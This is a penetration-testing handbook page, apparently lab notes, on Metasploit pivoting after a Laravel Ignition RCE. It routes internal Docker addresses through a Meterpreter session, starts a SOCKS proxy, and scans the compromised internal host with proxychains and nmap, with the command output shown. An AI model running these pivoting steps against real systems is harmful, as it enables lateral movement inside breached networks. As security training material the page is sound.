handbook/tools/4.Exploitation/Metasploit/Modules/Services/Proxy.md
2024-08-31 01:07:22 +02:00

66 lines
1.8 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## Command
Routing the Service
```
# The discovered webserice_database IP will be routed to through the Meterpreter session
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.28.101.51/32 -1
[*] Route added
```
- website_databse ---> This is from the .env variable in the docker file ()
Routing Machine
```
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.17.0.1/32 -1
[*] Route added
```
Check the routing settings
```
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
172.17.0.1 255.255.255.255 Session 3
172.28.101.51 255.255.255.255 Session 3
[*] There are currently no IPv6 routes defined.
```
Setup Sock Proxy
```
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 1.
[*] Starting the SOCKS proxy server
```
Using the target machine
```
# From the attackers host machine, we can use curl with the internal Docker IP to show that the web application is running, and the socks proxy works
$ curl --proxy socks4a://localhost:9050 http://172.17.0.1 -v
… etc …
# From the attackers host machine, we can use ProxyChains to scan the compromised host machine for common ports
$ proxychains -q nmap -n -sT -Pn -p 22,80,443,5432 172.17.0.1
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 08:48 EDT
Nmap scan report for 172.17.0.1
Host is up (0.069s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp closed https
5432/tcp closed postgresql
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
```